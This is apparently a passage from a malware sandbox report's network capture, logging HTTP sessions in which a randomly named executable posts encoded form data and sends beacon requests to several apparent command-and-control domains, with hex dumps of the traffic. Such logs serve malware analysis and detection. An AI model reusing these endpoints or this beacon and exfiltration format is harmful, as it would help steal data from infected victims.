                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 4b 72 42 6a 69 41 72 69 54 34 78 67 75 77 36 4a 30 33 6a 59 49 58 66 6e 4d 35 6d 37 4a 35 36 42 50 76 38 4e 41 30 50 41 47 43 65 37 35 4c 4d 61 7a 57 2b 4a 68 43 6e 41 49 66 69 37 54 6f 4e 7a 6c 62 6e 47 62 58 35 71 33 7a 52 59 62 59 65 59 4b 6c 31 54 41 4d 68 67 6a 35 4d 57 76 6e 71 4d 67 50 73 75 7a 47 44 36 79 54 32 58 2b 35 7a 66 41 6a 6f 41 2f 42 37 6e 2b 39 33 76 77 48 6b 6c 64 44 4d 4d 59 53 4e 77 38 57 52 59 70 4f 69 4a 4d 77 4c 37 51 31 6f 32 61 47 48 4e 71 2f 67 72 77 2f 51 47 63 75 38 63 55 41 4b 46 35 43 41 33 72 5a 79 35 51 31 51 56 35 63 7a 69 48 38 4d 73 74 58 46 39 72 6e 55 3d
                                                                                          Data Ascii: gHCXmDU=KrBjiAriT4xguw6J03jYIXfnM5m7J56BPv8NA0PAGCe75LMazW+JhCnAIfi7ToNzlbnGbX5q3zRYbYeYKl1TAMhgj5MWvnqMgPsuzGD6yT2X+5zfAjoA/B7n+93vwHkldDMMYSNw8WRYpOiJMwL7Q1o2aGHNq/grw/QGcu8cUAKF5CA3rZy5Q1QV5cziH8MstXF9rnU=
Sep 30, 2024 18:45:30.783900976 CEST | 375 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Mon, 30 Sep 2024 16:45:30 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49726 | 31.31.196.17 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 18:45:33.269056082 CEST | 826 | OUT | POST /66j2/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.dverkom.store
                                                                                          Origin: http://www.dverkom.store
                                                                                          Referer: http://www.dverkom.store/66j2/
                                                                                          Content-Length: 228
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 4b 72 42 6a 69 41 72 69 54 34 78 67 73 52 4b 4a 32 57 6a 59 64 48 66 6b 4a 35 6d 37 41 5a 36 2f 50 76 67 4e 41 31 4c 71 47 77 4b 37 2b 76 45 61 77 53 71 4a 78 53 6e 41 63 76 69 2b 4f 59 4e 38 6c 61 62 4f 62 53 35 71 33 33 42 59 62 64 79 59 4c 55 31 51 53 73 68 69 75 5a 4d 59 72 6e 71 4d 67 50 73 75 7a 43 72 63 79 54 65 58 2f 4b 37 66 41 43 6f 50 79 68 37 6b 39 39 33 76 37 6e 6b 66 64 44 4e 5a 59 58 55 6e 38 55 5a 59 70 4d 36 4a 4d 42 4c 30 4a 6c 6f 77 46 57 47 6e 68 71 4a 30 34 73 73 41 5a 39 46 44 44 42 2b 6d 78 55 74 64 78 37 36 52 44 56 38 74 70 50 37 56 57 4d 74 46 33 30 56 4e 31 77 44 68 6c 43 58 50 54 77 4b 47 41 77 64 66 6c 6a 6f 69 45 39 6f 43
                                                                                          Data Ascii: gHCXmDU=KrBjiAriT4xgsRKJ2WjYdHfkJ5m7AZ6/PvgNA1LqGwK7+vEawSqJxSnAcvi+OYN8labObS5q33BYbdyYLU1QSshiuZMYrnqMgPsuzCrcyTeX/K7fACoPyh7k993v7nkfdDNZYXUn8UZYpM6JMBL0JlowFWGnhqJ04ssAZ9FDDB+mxUtdx76RDV8tpP7VWMtF30VN1wDhlCXPTwKGAwdfljoiE9oC
Sep 30, 2024 18:45:33.928003073 CEST | 375 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Mon, 30 Sep 2024 16:45:33 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49727 | 31.31.196.17 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 18:45:35.819681883 CEST | 1843 | OUT | POST /66j2/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.dverkom.store
                                                                                          Origin: http://www.dverkom.store
                                                                                          Referer: http://www.dverkom.store/66j2/
                                                                                          Content-Length: 1244
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 4b 72 42 6a 69 41 72 69 54 34 78 67 73 52 4b 4a 32 57 6a 59 64 48 66 6b 4a 35 6d 37 41 5a 36 2f 50 76 67 4e 41 31 4c 71 47 78 79 37 2b 64 63 61 79 7a 71 4a 6a 43 6e 41 41 2f 69 2f 4f 59 4e 62 6c 62 7a 77 62 53 45 64 33 31 4a 59 61 2f 36 59 4d 67 70 51 5a 73 68 69 78 4a 4d 56 76 6e 71 46 67 50 38 69 7a 47 50 63 79 54 65 58 2f 4c 4c 66 4a 7a 6f 50 30 68 37 6e 2b 39 33 7a 77 48 6c 77 64 44 6b 69 59 54 4a 61 2f 6b 35 59 71 73 71 4a 4b 6e 6e 30 57 31 6f 79 45 57 47 2f 68 71 4e 52 34 73 77 39 5a 38 68 6c 44 47 53 6d 79 46 4d 30 67 71 57 4c 5a 45 42 4c 36 4f 76 75 44 37 4e 33 6f 45 6b 35 76 67 4c 6a 6f 77 44 54 63 33 58 45 4a 69 45 32 7a 79 38 78 4e 4c 42 57 47 4c 74 4b 47 49 66 78 59 33 56 76 6a 37 4c 34 32 4e 55 58 30 71 47 71 67 58 58 42 4c 50 6d 61 6e 54 55 38 69 68 69 4d 39 52 70 48 68 71 6e 4c 5a 50 54 47 44 39 49 70 36 45 73 62 4f 2b 30 34 79 71 57 51 6d 41 76 36 64 57 64 5a 51 48 39 67 41 2b 6e 74 48 70 34 69 42 66 46 52 6d 32 2f 72 63 70 34 58 33 35 31 34 4f 58 69 57 5a 30 [TRUNCATED]
                                                                                          Data Ascii: gHCXmDU=KrBjiAriT4xgsRKJ2WjYdHfkJ5m7AZ6/PvgNA1LqGxy7+dcayzqJjCnAA/i/OYNblbzwbSEd31JYa/6YMgpQZshixJMVvnqFgP8izGPcyTeX/LLfJzoP0h7n+93zwHlwdDkiYTJa/k5YqsqJKnn0W1oyEWG/hqNR4sw9Z8hlDGSmyFM0gqWLZEBL6OvuD7N3oEk5vgLjowDTc3XEJiE2zy8xNLBWGLtKGIfxY3Vvj7L42NUX0qGqgXXBLPmanTU8ihiM9RpHhqnLZPTGD9Ip6EsbO+04yqWQmAv6dWdZQH9gA+ntHp4iBfFRm2/rcp4X3514OXiWZ0H7G5zVOze5hL9b5yOvdrrtBtrRMclwyWXPomugD/7qB4ZJE7m2NGzYXCbigQuMuplA3cE8K8AK99k33++4qtS3F5b8yUyV/5HlrSgfOdSZGdKXlkP6NiLlRUTvaallIb579q6JaHqjV0ZeQElY2Z86Vt5FSyDuZYhnbSDoSBPy9wSVqO2Jv6EBBOOBRjrwXKFyovUnI6HvoAqhKQYb83TtRSFeA2ZKsZC78tVR0l/9QnkCaorroyeBflNo4Gv4RynbMfNoRmsV3ZiI5AI6GIP8uMgej2MucmEFq4FS6at2h6I7p9m14pOpS4+umgmuMbs0DVJCrqFfZK/AFtBqADVGOTI1lY43CXuFMEJTHG83lHlKxgYKc+a/+Dzie6IxDTMNuo0DXa+NF5bl+WWOVsXHp6cdUbgIDMyF/3XPE6rXwxzsLW1UXbL/q2gBcyiXWP4pALlmzX+hGgw7MEthWpE0HDhi+mhC2kbqO9qx1dIfnhvWP07B8kh0Dz2AmSs8h2IK4jsCoDbldmpnRZPbQkbIprIvCTfvdUo1vXsEKQ3v/Qi91rnWnxK5hBnzMeSHF8xeWscul3hVzyXxOuputrn46VwsLTy3IZzk5XvP9DJEepRs3U1ANSLpJrH7jQag0MjbfwV8GWK18/H3/kBDq0omrn8p6Jv59/EH [TRUNCATED]
                                                                                          Timestamp: Sep 30, 2024 18:45:36.499644041 CEST | Bytes transferred: 375 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Mon, 30 Sep 2024 16:45:36 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                          Session ID: 16 | Source IP: 192.168.2.5 | Source Port: 49728 | Destination IP: 31.31.196.178 | Destination Port: 80 | PID: 1220 | Process: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp: Sep 30, 2024 18:45:38.367938042 CEST | Bytes transferred: 544 | Direction: OUT | Data: GET /66j2/?Gh9=g8u8&gHCXmDU=HppDh2G+RtpfmDCT0lrSNXbmIaO8PdTsBI8zXGv7BhGUw+IQzheJ3lftE5yUT4NGt8aZPQR/20xdb9u1HnRpXJ4mqLkzjkiMvvw05xDKhjbhyfyxEkkTngu+5afP1ml7ew== HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Host: www.dverkom.store
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Timestamp: Sep 30, 2024 18:45:39.050970078 CEST | Bytes transferred: 733 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Mon, 30 Sep 2024 16:45:38 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                          Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                          Session ID: 17 | Source IP: 192.168.2.5 | Source Port: 49729 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1220 | Process: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp: Sep 30, 2024 18:45:44.357346058 CEST | Bytes transferred: 821 | Direction: OUT | Data: POST /8y34/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.crowsecurity.cloud
                                                                                          Origin: http://www.crowsecurity.cloud
                                                                                          Referer: http://www.crowsecurity.cloud/8y34/
                                                                                          Content-Length: 208
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 61 57 64 4d 69 43 37 4a 4a 32 78 68 42 2f 6f 64 6f 7a 41 4d 34 6b 30 43 30 47 71 41 6f 79 41 37 68 51 4c 6f 5a 49 36 67 43 43 73 36 6b 33 30 4e 35 49 4d 5a 62 30 7a 6d 7a 73 6c 5a 47 4d 72 6c 33 48 54 44 6e 38 70 4a 67 2b 77 31 41 6f 61 52 4d 36 42 5a 43 7a 52 59 4f 73 37 71 78 6c 76 51 63 4b 6e 62 33 43 45 50 61 66 48 50 59 6a 7a 35 73 53 34 39 6c 38 72 36 61 37 39 64 4d 43 47 70 4e 48 6f 43 58 70 55 48 69 35 36 69 4f 4e 31 42 77 74 39 33 4a 6f 35 56 6b 78 51 79 38 31 4b 30 59 49 63 6a 66 41 33 47 42 4f 53 6c 66 51 55 32 68 6f 43 4b 64 31 46 71 73 75 61 2f 6b 63 6c 46 62 33 59 48 77 7a 6f 3d
                                                                                          Data Ascii: gHCXmDU=aWdMiC7JJ2xhB/odozAM4k0C0GqAoyA7hQLoZI6gCCs6k30N5IMZb0zmzslZGMrl3HTDn8pJg+w1AoaRM6BZCzRYOs7qxlvQcKnb3CEPafHPYjz5sS49l8r6a79dMCGpNHoCXpUHi56iON1Bwt93Jo5VkxQy81K0YIcjfA3GBOSlfQU2hoCKd1Fqsua/kclFb3YHwzo=


                                                                                          Session ID: 18 | Source IP: 192.168.2.5 | Source Port: 49730 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1220 | Process: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp: Sep 30, 2024 18:45:46.897329092 CEST | Bytes transferred: 841 | Direction: OUT | Data: POST /8y34/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.crowsecurity.cloud
                                                                                          Origin: http://www.crowsecurity.cloud
                                                                                          Referer: http://www.crowsecurity.cloud/8y34/
                                                                                          Content-Length: 228
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 61 57 64 4d 69 43 37 4a 4a 32 78 68 41 66 30 64 74 51 6f 4d 74 55 30 64 37 6d 71 41 69 53 42 79 68 51 33 6f 5a 4a 2b 77 58 67 34 36 6c 57 45 4e 34 4e 67 5a 4f 30 7a 6d 35 4d 6c 63 49 73 72 2b 33 48 66 4c 6e 35 52 4a 67 2b 30 31 41 73 57 52 4d 4c 42 65 44 6a 52 65 45 38 37 6b 2f 46 76 51 63 4b 6e 62 33 43 51 31 61 66 50 50 5a 54 6a 35 73 77 41 2b 73 63 72 35 64 37 39 64 49 43 47 79 4e 48 6f 67 58 72 67 39 69 36 43 69 4f 4e 46 42 77 35 6f 68 53 59 35 66 37 68 52 34 77 58 48 41 53 59 49 51 53 52 58 43 56 74 57 49 54 47 35 63 37 4b 4b 69 4f 56 70 53 38 39 53 49 31 73 45 73 42 55 49 33 75 6b 2f 62 2f 35 6e 4d 6f 34 33 42 36 62 70 62 62 7a 39 35 5a 33 52 69
                                                                                          Data Ascii: gHCXmDU=aWdMiC7JJ2xhAf0dtQoMtU0d7mqAiSByhQ3oZJ+wXg46lWEN4NgZO0zm5MlcIsr+3HfLn5RJg+01AsWRMLBeDjReE87k/FvQcKnb3CQ1afPPZTj5swA+scr5d79dICGyNHogXrg9i6CiONFBw5ohSY5f7hR4wXHASYIQSRXCVtWITG5c7KKiOVpS89SI1sEsBUI3uk/b/5nMo43B6bpbbz95Z3Ri


                                                                                          Session ID: 19 | Source IP: 192.168.2.5 | Source Port: 49731 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1220 | Process: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp: Sep 30, 2024 18:45:49.449060917 CEST | Bytes transferred: 1858 | Direction: OUT | Data: POST /8y34/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.crowsecurity.cloud
                                                                                          Origin: http://www.crowsecurity.cloud
                                                                                          Referer: http://www.crowsecurity.cloud/8y34/
                                                                                          Content-Length: 1244
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 61 57 64 4d 69 43 37 4a 4a 32 78 68 41 66 30 64 74 51 6f 4d 74 55 30 64 37 6d 71 41 69 53 42 79 68 51 33 6f 5a 4a 2b 77 58 68 41 36 6b 6b 4d 4e 36 71 30 5a 63 45 7a 6d 69 4d 6c 64 49 73 71 73 33 48 48 31 6e 35 73 72 67 38 38 31 43 50 65 52 4f 35 6c 65 4b 6a 52 65 4d 63 37 6c 78 6c 76 2f 63 4b 57 63 33 43 41 31 61 66 50 50 5a 52 72 35 72 69 34 2b 71 63 72 36 61 37 39 52 4d 43 48 64 4e 44 46 64 58 72 6b 58 69 4c 69 69 4f 70 68 42 2f 71 51 68 50 6f 35 5a 34 68 51 74 77 58 4c 66 53 5a 6c 70 53 52 79 76 56 74 65 49 52 68 51 33 72 72 79 67 56 32 6c 30 7a 64 32 6b 67 71 42 56 47 47 51 4e 6a 57 6a 70 33 72 58 77 6b 59 7a 36 34 62 63 4e 4f 33 46 38 61 77 4d 55 54 54 55 6d 77 56 47 48 52 77 6c 53 36 4f 78 75 4e 59 69 30 4f 30 57 7a 77 73 58 77 31 50 31 6c 4a 75 37 71 74 64 66 52 4c 66 71 66 48 4c 2f 72 70 78 53 69 68 32 34 54 56 65 58 47 49 2b 68 4d 55 35 76 46 36 67 36 78 39 30 72 78 2b 35 4a 45 4a 51 74 69 30 6a 30 31 61 58 76 73 72 38 6e 37 6f 32 6a 2b 39 61 36 43 51 70 54 4a 4e 78 [TRUNCATED]


                                                                                          Session ID: 20 | Source IP: 192.168.2.5 | Source Port: 49732 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1220 | Process: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp: Sep 30, 2024 18:45:51.993941069 CEST | Bytes transferred: 549 | Direction: OUT | Data: GET /8y34/?gHCXmDU=XU1sh1XtMideJdcsvQ849SwdzHfbiD52gXGwR5WASyJ1tlInyqc9ITTs981nRcft/RKcq7FVheMXMN6zJo5iI2BJEO7R6UftY8jdwwsPJfysQECRq1QA/MaERKdZHzC5fw==&Gh9=g8u8 HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Host: www.crowsecurity.cloud
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Timestamp: Sep 30, 2024 18:45:52.447935104 CEST | Bytes transferred: 404 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                                          Server: openresty
                                                                                          Date: Mon, 30 Sep 2024 16:45:52 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 264
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 48 43 58 6d 44 55 3d 58 55 31 73 68 31 58 74 4d 69 64 65 4a 64 63 73 76 51 38 34 39 53 77 64 7a 48 66 62 69 44 35 32 67 58 47 77 52 35 57 41 53 79 4a 31 74 6c 49 6e 79 71 63 39 49 54 54 73 39 38 31 6e 52 63 66 74 2f 52 4b 63 71 37 46 56 68 65 4d 58 4d 4e 36 7a 4a 6f 35 69 49 32 42 4a 45 4f 37 52 36 55 66 74 59 38 6a 64 77 77 73 50 4a 66 79 73 51 45 43 52 71 31 51 41 2f 4d 61 45 52 4b 64 5a 48 7a 43 35 66 77 3d 3d 26 47 68 39 3d 67 38 75 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gHCXmDU=XU1sh1XtMideJdcsvQ849SwdzHfbiD52gXGwR5WASyJ1tlInyqc9ITTs981nRcft/RKcq7FVheMXMN6zJo5iI2BJEO7R6UftY8jdwwsPJfysQECRq1QA/MaERKdZHzC5fw==&Gh9=g8u8"}</script></head></html>


                                                                                          Session ID: 21 | Source IP: 192.168.2.5 | Source Port: 49733 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1220 | Process: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp: Sep 30, 2024 18:45:57.488435030 CEST | Bytes transferred: 833 | Direction: OUT | Data: POST /kdfx/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.multileveltravel.world
                                                                                          Origin: http://www.multileveltravel.world
                                                                                          Referer: http://www.multileveltravel.world/kdfx/
                                                                                          Content-Length: 208
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
